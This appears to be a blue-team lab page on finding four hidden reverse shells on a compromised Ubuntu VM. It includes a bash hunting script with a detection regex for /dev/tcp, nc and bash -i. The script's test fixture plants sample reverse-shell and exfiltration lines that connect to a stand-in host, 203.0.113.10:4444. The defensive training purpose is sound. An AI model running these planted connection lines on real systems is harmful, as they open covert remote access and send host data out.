
Reverse Shell Cleanup

Difficulty

  • intermediate

Average duration

1 hr

Technologies

  • reverse-shell

  • post-exploitation

  • cybersecurity

  • linux

  • blue-team

  • threat-hunting

  • incident response


Reverse Shell Cleanup

In this lab, you will face a live incident response scenario. A production Ubuntu server has been compromised, and attackers have left several active backdoors in the form of hidden reverse shells.

Your mission as a cybersecurity analyst is to locate the four shells, validate their paths, and help recover the server.

In this lab you will learn:

  • Post-exploitation behavior analysis
  • Searching for persistence in cron, systemd, and suspicious scripts
  • Using Linux commands to track processes and files

🌱 How to start this lab

👉 This challenge uses a virtual machine designed for post-exploitation scenarios.

  1. If you don't have it yet, download the virtual machine from this link:
     https://storage.googleapis.com/cybersecurity-machines/emergency-lab.ova
  2. Import the virtual machine into VirtualBox or VMware.
  3. Start the VM and log in as the default user. The terminal will already be active at the beginning of the exercise.

📄 Instructions

You have logged into a production Ubuntu server after the monitoring team detected suspicious outgoing traffic. It is suspected that the system was compromised by an attacker who left four hidden reverse shells. Your task is to find them, identify the exact path of each one, and validate them using the validator.py script.

Your mission: find the reverse shells

  1. Explore the system using commands you would use if you suspected malicious activity. Think about tools to view processes, open files, or network connections:

    • find, grep, cat, ls, stat, crontab, systemctl, etc.

  2. Reflect: what mechanisms allow a script to run automatically in Linux? Where would you look for signs of persistence? Examine possible persistence paths: /etc/cron.d/, /opt/, /usr/local/bin/, /var/backups/, /lib/systemd/system/, etc.

  3. Some attackers don't create files with strange names. Sometimes they disguise their scripts with generic names that look legitimate. If a file seems harmless but includes instructions to establish an outbound connection from the server, it may deserve a closer look.

  4. Explore paths that are often overlooked in a superficial review: directories used for backups, custom scripts, or internal tools.

  5. Remember that attackers often use commands like bash, nc, or network redirections to open backdoors. But they don't always put them at the beginning of the script...

  6. Identify the absolute path of all 4 shells.

  7. Run the validator and provide the paths one by one:

    validate-lab

If the paths are correct, you will see a message like this:

    ✅ Well done! You've cleaned the server.
    🎁 Flag: FLAG{FLAG_01}
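The hunt described in steps 1 to 6, written out as a script you can run. This is an added example, not part of the lab or its VM: the indicator regex, the fixture tree, the planted file names and the 203.0.113.10 address are all constructed for the demo, while the directory list is the one from the instructions. It scans every listed location recursively, follows `ExecStart=` lines and cron command paths to the script they actually launch (so a unit or job with a harmless name still leads somewhere), and flags a file no matter where in it the indicator line sits, which is the point of step 5.

```shell
#!/usr/bin/env bash
# Added example for this lab (not part of the original page or its VM): a small
# hunting helper that scans the persistence locations listed in the instructions
# and reports every file containing an outbound-connection indicator, wherever
# in the file it sits. Every sample file built below is constructed for the demo.

# Indicator patterns (POSIX ERE). An assumption for this example; extend as needed:
# bash /dev/tcp|udp redirections, nc/ncat/netcat invocations, interactive bash,
# the stdin-to-socket back-redirect, and Python socket/pty use.
INDICATORS='/dev/(tcp|udp)/|(^|[[:space:];|&])(nc|ncat|netcat)[[:space:]]|bash[[:space:]]+-i|0>&1|socket\.create_connection|pty\.spawn'

# Persistence locations named in the lab text, kept relative so the same code
# runs against a fixture tree or, with ROOT "/", against the live filesystem.
PERSISTENCE_DIRS="etc/cron.d etc/crontab var/spool/cron opt usr/local/bin var/backups lib/systemd/system etc/systemd/system"

# referenced_scripts ROOT: absolute paths that systemd units (ExecStart=) and
# cron entries launch, so a generic-looking unit or job leads to its script.
referenced_scripts() {
    local root=$1
    {
        grep -rhoE '^ExecStart=-?[^[:space:]]+' "$root/lib/systemd/system" \
            "$root/etc/systemd/system" 2>/dev/null | sed 's/^ExecStart=-*//' || true
        grep -rhoE '(^|[[:space:]])/[^[:space:]]+' "$root/etc/cron.d" \
            "$root/etc/crontab" 2>/dev/null | tr -d ' \t' || true
    } | sort -u
}

# hunt_reverse_shells ROOT: print "path:line:text" for every indicator hit under
# the persistence dirs and in any script they reference. Use ROOT "/" on a host.
hunt_reverse_shells() {
    local root d f targets=""
    root=${1:-/}; root=${root%/}          # "/" becomes "" so paths stay absolute
    for d in $PERSISTENCE_DIRS; do
        if [ -e "$root/$d" ]; then targets="$targets $root/$d"; fi
    done
    for f in $(referenced_scripts "$root"); do
        if [ -f "$root$f" ]; then targets="$targets $root$f"; fi
    done
    [ -n "$targets" ] || return 0
    # -r recurse, -n line numbers, -H always print the file, -I skip binaries
    grep -rnHIE "$INDICATORS" $targets 2>/dev/null | sort -u
    return 0
}

# hunt_paths ROOT: the distinct flagged files, one per line (what the validator wants)
hunt_paths() {
    hunt_reverse_shells "$1" | cut -d: -f1 | sort -u
}

# make_fixture: build a throwaway tree mimicking the lab layout, with one benign
# job and three planted scripts. Constructed sample data, not the lab's files.
make_fixture() {
    local root
    root=$(mktemp -d)
    mkdir -p "$root/etc/cron.d" "$root/usr/local/bin" "$root/var/backups" \
             "$root/lib/systemd/system" "$root/opt/metrics"
    # benign cron job and its target
    printf '0 2 * * * root /usr/local/bin/rotate-logs\n' > "$root/etc/cron.d/logrotate"
    printf '#!/bin/sh\nfind /var/log -name "*.1" -delete\n' > "$root/usr/local/bin/rotate-logs"
    # planted 1: generic backup name, indicator buried after real-looking work
    printf '#!/bin/bash\n# nightly database dump\ntar czf /var/backups/db.tgz /var/lib/db\nexec 5<>/dev/tcp/203.0.113.10/4444\n' \
        > "$root/var/backups/db-backup.sh"
    # planted 2: cron entry with a plausible name pointing at a Python beacon
    printf '*/5 * * * * root /usr/local/bin/healthcheck\n' > "$root/etc/cron.d/system-health"
    printf '#!/usr/bin/env python3\nimport socket\ns = socket.create_connection(("203.0.113.10", 4444))\n' \
        > "$root/usr/local/bin/healthcheck"
    # planted 3: systemd unit whose ExecStart reaches an nc line in /opt
    printf '[Service]\nExecStart=/opt/metrics/agent.sh\n[Install]\nWantedBy=multi-user.target\n' \
        > "$root/lib/systemd/system/metrics-agent.service"
    printf '#!/bin/sh\nuptime > /tmp/m.txt\ncat /tmp/m.txt | nc 203.0.113.10 4444\n' \
        > "$root/opt/metrics/agent.sh"
    printf '%s\n' "$root"
}

# Demo run over the fixture; on the lab VM call: hunt_reverse_shells /
DEMO_ROOT=$(make_fixture)
hunt_reverse_shells "$DEMO_ROOT"
rm -rf "$DEMO_ROOT"
```

Run as is and the three planted files are reported with the line that gave them away; on the lab VM, run `hunt_paths /` as root and feed each distinct path to the validator. Treat a hit as a lead, not a verdict: a legitimate monitoring agent also opens outbound sockets, so read the file with `cat` and check its timestamps with `stat` before deciding it is one of the four shells.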

Now it's your turn to think like a true Blue Team analyst. Recovering the server depends on you!

Good luck, Analyst!

